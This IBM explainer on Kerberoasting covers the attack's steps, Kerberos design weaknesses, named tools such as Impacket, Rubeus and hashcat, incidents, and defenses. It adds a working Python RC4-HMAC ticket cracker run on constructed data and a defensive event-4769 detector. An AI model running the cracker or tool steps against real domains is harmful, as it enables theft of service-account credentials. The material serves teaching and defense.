
Published: 13 May 2024
Contributor: Matthew Kosinski

What is a Kerberoasting attack? 

Kerberoasting is a cyberattack that abuses the Kerberos authentication protocol. An attacker who holds any authenticated domain account requests Kerberos service tickets for accounts that carry service principal names (SPNs), takes the tickets offline and cracks them to recover the plaintext passwords of those service accounts. The attacker then logs in as the service accounts to steal data, spread malware and more.

Kerberoasting is growing more common. IBM's X-Force® security analysts saw a 100% increase in Kerberoasting incidents between 2022 and 2023, according to the X-Force Threat Intelligence Index. This growth is part of a broad trend of hackers abusing valid accounts to breach networks. Improvements in network and endpoint security have made direct attacks much harder to pull off.

A few additional factors fuel Kerberoasting's popularity. Many directory services and cloud computing systems use Kerberos, which means that hackers can leverage the protocol to gain access to critical network infrastructure.  

In particular, Kerberos is the default authentication protocol in Microsoft Windows Active Directory, and most Kerberoasting attacks target Active Directory domains. Manually created service accounts also tend to have weak, rarely changed passwords and high privileges, which makes them attractive targets.

Kerberoasting attacks are difficult to detect because they take advantage of Kerberos's intended design. The most suspicious part of a Kerberoasting attack—decrypting the stolen tickets—happens offline. Cybersecurity professionals can't completely eradicate the possibility of Kerberoasting, but they can deploy proactive defenses to mitigate the threat. 

How does Kerberoasting work? 

Kerberoasting is typically a means of privilege escalation rather than an initial break-in tactic. After an attacker gains control of a domain user account and a foothold in the network, they use Kerberoasting to expand their reach.

Most Kerberoasting attacks follow the same basic method: 

  1. Using a compromised domain account, the attacker requests Kerberos service tickets for the services (SPNs) they want to target.

  2. The attacker copies the encrypted tickets to a computer they control, outside the network they are attacking.

  3. Offline, the attacker cracks the tickets by guessing passwords until one produces a key that decrypts a ticket; that password belongs to the service account behind the ticket.

  4. The attacker logs in to the network with the service account's credentials and abuses its permissions to move laterally and cause harm.
Why does Kerberoasting work? 

To understand why Kerberoasting works, one must first understand the basics of Kerberos.

Kerberos is an authentication protocol that lets users and services (such as apps, databases and servers) securely authenticate and communicate within Active Directory and other domains.  

The Kerberos authentication process uses a ticketing system. At the heart of this system is the key distribution center (KDC), which in Active Directory runs on every domain controller.

The KDC is essentially the gatekeeper of the domain. It authenticates users and services on the network and issues them tickets. Tickets are credentials that prove users’ identities and allow them to access other resources on the network. The users and services exchange these tickets to verify themselves to one another. 

When a user logs in to a domain, they first authenticate with the KDC and receive a ticket-granting ticket (TGT). This TGT enables the user to request access to domain services. 

When the user wants to access a service, they send a request to the KDC's ticket-granting service (TGS). The TGT accompanies this request to vouch for the user's identity. 

In response, the KDC issues a service ticket, also called a "TGS ticket." The sensitive part of the ticket is encrypted with the long-term key of the target service's account, a key derived from that account's password, so only the target service (and the KDC) can decrypt it. The user presents this service ticket to the target service, which decrypts it, authenticates the user and begins a secure session.

There are a few details of Kerberos’s design that leave it open to Kerberoasting.  

First, the KDC does not check whether users are authorized to access a service. Any user can request a ticket for any service. It is up to the individual services to enforce permissions and block unauthorized users. Therefore, hackers don't need to seize the accounts of domain admins or other privileged users. Any compromised account works.

Second, every Kerberos service must be registered to an account, identified by a service principal name (SPN) on that account; in Active Directory the account is either a computer account or a user account that runs the service. The KDC encrypts tickets for the service with that account's key. User-based service accounts are the targets, because they tend to have high privileges and human-chosen passwords, whereas computer accounts have long random passwords that are not practical to crack.

Third, Kerberos tickets are encrypted with keys derived from the associated accounts' passwords. With the older RC4-HMAC encryption type the key is simply the account's NT password hash; with AES it is derived from the password by a salted key-derivation function. Either way, a service ticket is encrypted with a key that depends on nothing but the service account's password.

Account passwords make convenient symmetric keys because only the KDC and the service itself should know the password. But because the ticket is protected by nothing more than a function of that password, anyone holding a ticket can guess passwords offline, derive the key from each guess and test whether it decrypts the ticket. No further contact with the domain is needed, and the KDC never sees the failed guesses.

Additionally, manually configured service accounts often have the “password never expires” flag enabled. In long-standing networks, this can mean that service accounts use very old passwords that follow outdated security guidelines, making them easy to crack. 

The Kerberoasting process
1. Hijacking a user account

The first step in a typical Kerberoasting attack is to compromise a domain user's account, whether by phishing, keyloggers or any other credential-theft technique. Any account will do; it only needs to be able to authenticate to the domain.

2. Identifying targets 

Once inside, the attacker searches for service accounts. They do this by looking for accounts with service principal names (SPNs), the unique identifiers that tie services to accounts in a Kerberos domain. The servicePrincipalName attribute is readable by every authenticated domain account by default, so enumerating the user accounts that carry an SPN is a handy way to find targets. Computer accounts also have SPNs, but attackers skip them because their passwords are long and random.

Attackers can use PowerShell cmdlets and Lightweight Directory Access Protocol (LDAP) queries to surface accounts with SPNs, or specialized penetration-testing tools. For example, the Impacket toolkit includes a script called GetUserSPNs.py that lists the user accounts in a domain that have SPNs and, with its -request option, requests a service ticket for each one and prints it in a format that password crackers accept.

3. Stealing tickets 

The hacker uses the hijacked domain account to request service tickets for their targeted services.

The hacker doesn't use these tickets to access those services. They could, but they would have only the limited permissions of the likely low-level stolen user account. Instead, the hacker takes these tickets out of the network to a computer they control.

4. Password cracking 

The attacker cracks the stolen tickets offline to recover the service accounts' passwords.

Because a ticket is encrypted with a key derived from the service account's password, cracking is a guess-and-check loop: the attacker takes a candidate password, derives the corresponding Kerberos key from it (for RC4-HMAC tickets, simply the NT hash) and tries that key on the ticket. If the ticket decrypts and its integrity check passes, the candidate is the service account's password. The KDC is never contacted during this loop, so there are no failed-logon events and no account lockouts.

Attackers speed up cracking with wordlists of common passwords and GPU-based crackers. Some of the most common Kerberoasting tools include:

  • Impacket: A Python toolkit designed for penetration testers. Its GetUserSPNs.py script enumerates SPN-bearing accounts and requests their service tickets from a Linux host.

  • Rubeus: A C# toolset for abusing Kerberos on Windows; its kerberoast command enumerates targets, requests tickets and outputs them in crackable form. Like many ethical hacking tools, it is also used by criminals.

  • John the Ripper and Hashcat: Password crackers that run the offline guess-and-check loop against the extracted tickets; Hashcat, for example, has dedicated krb5tgs modes for RC4 and AES tickets.

  • Mimikatz: Can request service tickets and export Kerberos tickets from memory on a compromised Windows host; it does not crack them.

Ticket cracking is the most incriminating step in the process, but it happens outside the target network on hardware the attacker controls, where the organization's security tools cannot see it. Detection therefore has to focus on the ticket requests themselves.

5. Using the password 

Armed with a service account's password, the hacker can log in to that account and use its permissions to access sensitive resources, make lateral movements and more.

For example, if a hacker cracks the password of an SQL server's service account, they could gain control of the databases hosted on that server. 
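To make steps 3 through 5 concrete, the script below plays both sides of the attack for an RC4-HMAC ticket: it seals a ticket with the service account's key the way the KDC does (RFC 4757 RC4-HMAC, key usage 2), renders it in the $krb5tgs$23$ layout that Hashcat and John read, then brute-forces it from a wordlist exactly as those crackers do. This is an added example, not code from the article, Impacket, Rubeus or hashcat; the realm, SPN, account name, password, wordlist and the stand-in ticket body are all constructed for it.

```python
"""Offline crack of an RC4-HMAC (etype 23) Kerberos service ticket.

Added example, not code from the IBM article, Impacket, Rubeus or hashcat. It
re-implements the RFC 4757 RC4-HMAC sealing a KDC applies to a ticket's enc-part
(key usage 2) so one script can be the KDC and the attacker. All names, the
password, the wordlist and the ticket body are constructed for this example.
"""
import hmac
import struct
from hashlib import md5

MASK = 0xFFFFFFFF
TICKET_KEY_USAGE = 2  # RFC 4120: TGS-REP ticket enc-part, encrypted with the service key

def md4(data: bytes) -> bytes:
    """Pure-Python MD4 (RFC 1320); hashlib on OpenSSL 3 builds usually lacks it."""
    f = lambda x, y, z: (x & y) | (~x & z)
    g = lambda x, y, z: (x & y) | (x & z) | (y & z)
    h = lambda x, y, z: x ^ y ^ z
    rol = lambda v, n: ((v << n) | (v >> (32 - n))) & MASK
    msg = data + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64) + struct.pack("<Q", len(data) * 8)
    a0, b0, c0, d0 = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = a0, b0, c0, d0
        for i in range(16):  # round 1
            a = rol((a + f(b, c, d) + x[i]) & MASK, (3, 7, 11, 19)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):  # round 2
            k = (i % 4) * 4 + i // 4
            a = rol((a + g(b, c, d) + x[k] + 0x5A827999) & MASK, (3, 5, 9, 13)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):  # round 3
            k = (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)[i]
            a = rol((a + h(b, c, d) + x[k] + 0x6ED9EBA1) & MASK, (3, 9, 11, 15)[i % 4])
            a, b, c, d = d, a, b, c
        a0, b0 = (a0 + a) & MASK, (b0 + b) & MASK
        c0, d0 = (c0 + c) & MASK, (d0 + d) & MASK
    return struct.pack("<4I", a0, b0, c0, d0)

def nt_hash(password: str) -> bytes:
    """RC4-HMAC long-term key = NT hash = MD4(UTF-16LE(password)): no salt, no stretching."""
    return md4(password.encode("utf-16-le"))

def rc4(key: bytes, data: bytes) -> bytes:
    s, j = list(range(256)), 0
    for i in range(256):  # key scheduling
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out, i, j = bytearray(), 0, 0
    for byte in data:  # keystream generation
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)

def hmac_md5(key: bytes, data: bytes) -> bytes:
    return hmac.new(key, data, md5).digest()

def seal_ticket(service_key: bytes, ticket_body: bytes, confounder: bytes) -> bytes:
    """KDC side, RFC 4757 section 6: edata = checksum || RC4(K3, confounder || body)."""
    k1 = hmac_md5(service_key, struct.pack("<I", TICKET_KEY_USAGE))
    checksum = hmac_md5(k1, confounder + ticket_body)
    k3 = hmac_md5(k1, checksum)
    return checksum + rc4(k3, confounder + ticket_body)

def to_hashcat(user: str, realm: str, spn: str, edata: bytes) -> str:
    """Hashcat mode 13100 layout: $krb5tgs$23$*user$REALM$spn*$checksum$ciphertext."""
    return f"$krb5tgs$23$*{user}${realm}${spn}*${edata[:16].hex()}${edata[16:].hex()}"

def crack_krb5tgs(line: str, wordlist):
    """Attacker side: derive a key from each guess; the HMAC over the decryption is the oracle."""
    checksum, cipher = (bytes.fromhex(part) for part in line.rsplit("$", 2)[1:])
    for candidate in wordlist:
        k1 = hmac_md5(nt_hash(candidate), struct.pack("<I", TICKET_KEY_USAGE))
        plain = rc4(hmac_md5(k1, checksum), cipher)  # K3 = HMAC(K1, checksum)
        if hmac.compare_digest(hmac_md5(k1, plain), checksum):
            return candidate
    return None

def demo():
    # KDC: the service account's password is the only secret protecting the ticket.
    service_key = nt_hash("Summer2019!")  # constructed weak, never-rotated password
    confounder = bytes.fromhex("0123456789abcdef")  # fixed here so the run is repeatable
    body = b"<EncTicketPart: cname=alice crealm=CORP.LOCAL session-key=... flags=...>"
    line = to_hashcat("svc_sql", "CORP.LOCAL", "MSSQLSvc/sql01.corp.local:1433",
                      seal_ticket(service_key, body, confounder))
    # Attacker, offline: nothing below talks to a domain controller.
    return crack_krb5tgs(line, ["Password1", "Welcome123", "Summer2019!", "Autumn2024!"])

if __name__ == "__main__":
    print(demo())  # Summer2019!
```

The cracking loop never contacts a KDC, which is the whole point: the only network activity in a real attack is the single ticket request. Each guess costs one MD4, two HMAC-MD5 computations and a short RC4 pass, which is why RC4 tickets fall in minutes when the password is in a wordlist; an AES ticket would cost thousands of PBKDF2 iterations per guess instead.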

Kerberoasting without stolen account credentials 

While Kerberoasting normally requires a compromised domain user account, security researcher Charlie Clark discovered a technique that, under the right conditions, lets attackers obtain service tickets without hijacking an account.1

Recall that before a user can receive service tickets, they normally authenticate with the KDC and get a TGT, then present the TGT in a request to the ticket-granting service. Using a modified version of the Kerberos exploitation tool Rubeus, Clark changed the initial authentication request (the AS-REQ) so that its requested service name pointed at a target service's SPN instead of at the ticket-granting service. The KDC accepted it and responded with a ticket encrypted with that service account's key, which can be cracked exactly like a ticket obtained the usual way.

This method has limited applications. The AS-REQ must appear to come from an account that has Kerberos preauthentication disabled, because for accounts that require it (the default), the KDC will not return a ticket until the client proves knowledge of the account's password. The attacker also needs to know the target SPNs in advance, since they have no account with which to enumerate them. Still, wherever such accounts exist, the technique turns Kerberoasting into an unauthenticated attack.

Kerberoasting examples 

Hackers have used Kerberoasting techniques in some of the most significant cyberattacks of the last few years.

In the 2020 SolarWinds attack, Russian state-sponsored hackers distributed malware disguised as a legitimate update to SolarWinds's Orion infrastructure management platform. The hackers breached several companies and government agencies, including the US State and Justice Departments. According to MITRE, the hackers used Kerberoasting to escalate their privileges in compromised environments.2

Likewise, hackers associated with the Akira ransomware often use Kerberoasting to expand their reach and maintain access to the networks they breach. As of April 2024, Akira has hit 250 organizations worldwide, extorting a total of USD 42 million in ransom payments.3

Kerberoasting versus golden ticket attacks 

While golden ticket attacks also target Kerberos authentication processes, they differ from Kerberoasting.

In Kerberoasting, hackers steal and crack tickets to uncover passwords and take over service accounts. 

In a golden ticket attack, the attacker first gains domain administrator-level privileges. This lets them extract the password hash of the krbtgt account, the account whose key the KDC uses to encrypt and sign every TGT. With that key, the attacker forges TGTs that name any user with any group membership and gains virtually unrestricted access to network resources. The two attacks sit at opposite ends of the privilege scale: Kerberoasting needs no privileged access and yields one service account's password, while a golden ticket needs the highest privilege and yields the whole domain.

Detecting, mitigating and preventing Kerberoasting attacks 

Kerberoasting attacks are hard to spot because the attackers spend much of their time masquerading as legitimate accounts. Their ticket requests blend in with real ones, and the actual password cracking happens outside the network. 

That said, there are tools and practices organizations can use to reduce the chances of a successful attack and better intercept Kerberoasting in progress.

Identity and access management tools 

Because Kerberoasting attacks seize control of domain accounts, protecting these accounts with enhanced IAM controls can help thwart some breaches.

Strong password policies and practices, including centralized password management solutions, can make it harder for hackers to crack passwords. The MITRE ATT&CK framework, for example, recommends that service account passwords be at least 25 characters long, sufficiently complex and regularly changed.4

In Active Directory, organizations can use Group Managed Service Accounts (gMSAs). The domain controllers generate a long random password for a gMSA and rotate it automatically (every 30 days by default), and only the authorized hosts can retrieve it, so admins never set the password by hand and a captured ticket would require brute-forcing a random key, which is infeasible.

Strong authentication, like adaptive or multifactor authentication (MFA), can also help protect user accounts from theft. That said, it is often challenging and inefficient to use MFA for service accounts. 

Privileged access management 

Privileged access management tools can help provide extra security for the credentials of privileged accounts, such as Kerberos service accounts and other highly valued targets.

The principle of least privilege 

By limiting service account privileges to the permissions they need, organizations can minimize the damage hackers can do by compromising those accounts.

Additionally, service accounts can be denied interactive and remote desktop logon through Group Policy user-rights assignments and restricted to the specific hosts and services they run, so that a cracked password buys the attacker far less.

Monitoring Kerberos activity 

Malicious ticket requests blend in with legitimate ones, but attackers leave telltale signs. A single account requesting service tickets for many different SPNs within seconds, which a normal user never does, is the classic Kerberoasting pattern. Requests for RC4-encrypted tickets (ticket encryption type 0x17) in a domain where AES is the norm are another: the roasting tools ask for RC4 because it is far cheaper to crack.

On Windows domain controllers these requests are recorded in the Security log as event 4769, "A Kerberos service ticket was requested," which includes the requesting account, the service name, the client IP address and the ticket encryption type. Forwarding 4769 events to a security information and event management (SIEM) system lets security teams run these rules at scale, and user behavior analytics (UBA) can flag the compromised account whose activity has changed.

Security teams can catch more by aligning monitoring to their own environment. For example, any logon by a service account outside its predefined set of hosts, or any interactive logon by a service account, can trigger an alert that requires investigation.

Strengthening encryption 

Many domains still allow the RC4-HMAC encryption type (etype 23). An RC4 ticket is encrypted with the account's NT hash, which is an unsalted MD4 of the password, so a cracker can test enormous numbers of candidates per second on commodity GPUs. AES tickets (etypes 17 and 18) use keys derived through thousands of PBKDF2 iterations with a per-account salt, which makes each guess orders of magnitude more expensive.

Configuring service accounts to support only AES (through the msDS-SupportedEncryptionTypes attribute, or the "This account supports Kerberos AES" options on the account) prevents an attacker from simply asking for the weaker ticket type, and it makes any remaining 0x17 request in the logs a signal worth investigating. Stronger encryption does not stop the cracking of a weak password; it only slows it. Long random passwords remain the real defense.

Honeytokens 

Some organizations create honeytokens: fake domain accounts with an SPN that exist only to be attacked. No legitimate process ever requests a ticket for them, so any 4769 event naming the honey account is a high-confidence alert that lets the security team act.

Honeytokens are designed to attract the attacker's attention, often by appearing to have weak credentials, old passwords and high privileges.
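The three rules described above under monitoring, encryption and honeytokens (a burst of distinct SPNs from one account, an RC4 request for a service that elsewhere receives AES tickets, and any request naming a honeytoken account) are shown running over constructed 4769 records below. This is an added example, not code from the article or from any SIEM product; the field names follow the 4769 event schema, but the log records, the account and service names, the honeytoken name svc_legacy_crm, the five-minute window and the five-SPN threshold are all assumptions.

```python
"""Kerberoasting detection over Windows Security event 4769 records.

Added example, not from the IBM article or any SIEM product. Field names follow the
4769 event schema (TargetUserName, ServiceName, TicketEncryptionType, IpAddress); the
records, account and service names, honeytoken name and thresholds are constructed.
"""
from collections import defaultdict
from datetime import datetime, timedelta

RC4_HMAC, AES128, AES256 = "0x17", "0x11", "0x12"  # TicketEncryptionType values (etype 23, 17, 18)

# Constructed records in a flattened "timestamp key=value ..." form.
SAMPLE_4769_LOG = """\
2024-05-10T09:00:01 TargetUserName=alice@CORP.LOCAL ServiceName=WS042$ TicketEncryptionType=0x12 IpAddress=10.1.4.42
2024-05-10T09:00:05 TargetUserName=alice@CORP.LOCAL ServiceName=svc_sql TicketEncryptionType=0x12 IpAddress=10.1.4.42
2024-05-10T09:14:10 TargetUserName=bob@CORP.LOCAL ServiceName=svc_sql TicketEncryptionType=0x17 IpAddress=10.1.7.23
2024-05-10T09:14:11 TargetUserName=bob@CORP.LOCAL ServiceName=svc_http TicketEncryptionType=0x17 IpAddress=10.1.7.23
2024-05-10T09:14:11 TargetUserName=bob@CORP.LOCAL ServiceName=svc_backup TicketEncryptionType=0x17 IpAddress=10.1.7.23
2024-05-10T09:14:12 TargetUserName=bob@CORP.LOCAL ServiceName=svc_sap TicketEncryptionType=0x17 IpAddress=10.1.7.23
2024-05-10T09:14:12 TargetUserName=bob@CORP.LOCAL ServiceName=svc_legacy_crm TicketEncryptionType=0x17 IpAddress=10.1.7.23
2024-05-10T09:14:13 TargetUserName=bob@CORP.LOCAL ServiceName=krbtgt TicketEncryptionType=0x12 IpAddress=10.1.7.23
2024-05-10T11:30:00 TargetUserName=carol@CORP.LOCAL ServiceName=svc_http TicketEncryptionType=0x12 IpAddress=10.1.9.8
"""

def parse_events(text):
    """A real pipeline reads the EventData XML; this parses the flattened form above."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        stamp, *fields = line.split()
        ev = dict(field.split("=", 1) for field in fields)
        ev["time"] = datetime.fromisoformat(stamp)
        ev["user"] = ev["TargetUserName"].split("@")[0].lower()
        ev["service"] = ev["ServiceName"]
        ev["etype"] = ev["TicketEncryptionType"].lower()
        events.append(ev)
    return events

def roastable(service):
    """Kerberoasting tools skip computer accounts (random passwords) and krbtgt."""
    return not service.endswith("$") and service.lower() != "krbtgt"

def detect(events, honey_accounts, window_seconds=300, spn_threshold=5):
    alerts = []
    honey = {h.lower() for h in honey_accounts}
    # A service that has been issued AES tickets can do AES, so an RC4 request for it is a
    # client-chosen downgrade, which is what roasting tools do to get cheap-to-crack tickets.
    aes_capable = {e["service"] for e in events if e["etype"] in (AES128, AES256)}
    by_user = defaultdict(list)
    for e in sorted(events, key=lambda ev: ev["time"]):
        if e["service"].lower() in honey:  # nobody legitimate ever asks for the decoy
            alerts.append({"rule": "honeytoken", "user": e["user"], "service": e["service"], "ip": e["IpAddress"]})
        if e["etype"] == RC4_HMAC and e["service"] in aes_capable:
            alerts.append({"rule": "rc4_downgrade", "user": e["user"], "service": e["service"], "ip": e["IpAddress"]})
        if roastable(e["service"]):
            by_user[e["user"]].append(e)
    window = timedelta(seconds=window_seconds)
    for user, evs in by_user.items():  # many distinct SPNs from one account inside one window
        for i, start in enumerate(evs):
            services = {x["service"] for x in evs[i:] if x["time"] - start["time"] <= window}
            if len(services) >= spn_threshold:
                alerts.append({"rule": "spn_burst", "user": user, "services": sorted(services), "ip": start["IpAddress"]})
                break  # one alert per account; the analyst gets the full service list
    return alerts

def detect_sample():
    return detect(parse_events(SAMPLE_4769_LOG), honey_accounts=["svc_legacy_crm"])

if __name__ == "__main__":
    for alert in detect_sample():
        print(alert)
```

In the sample, alice's and carol's single requests produce nothing, while bob's activity trips all three rules: five distinct SPNs in three seconds, RC4 tickets for two services that other users obtain with AES, and a request for the decoy account. The krbtgt and computer-account requests are deliberately ignored by the burst rule because no roasting tool asks for them; keeping them in the count only adds noise.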

Footnotes


1 Clark, Charlie. New Attack Paths? As Requested Service Tickets. Semperis. 27 September 2022.

2 SolarWinds Compromise. MITRE ATT&CK. 14 April 2023.

3 StopRansomware: Akira Ransomware. Cybersecurity and Infrastructure Security Agency (CISA). 18 April 2024.

4 Steal or Forge Kerberos Tickets: Kerberoasting. MITRE ATT&CK. 30 March 2023.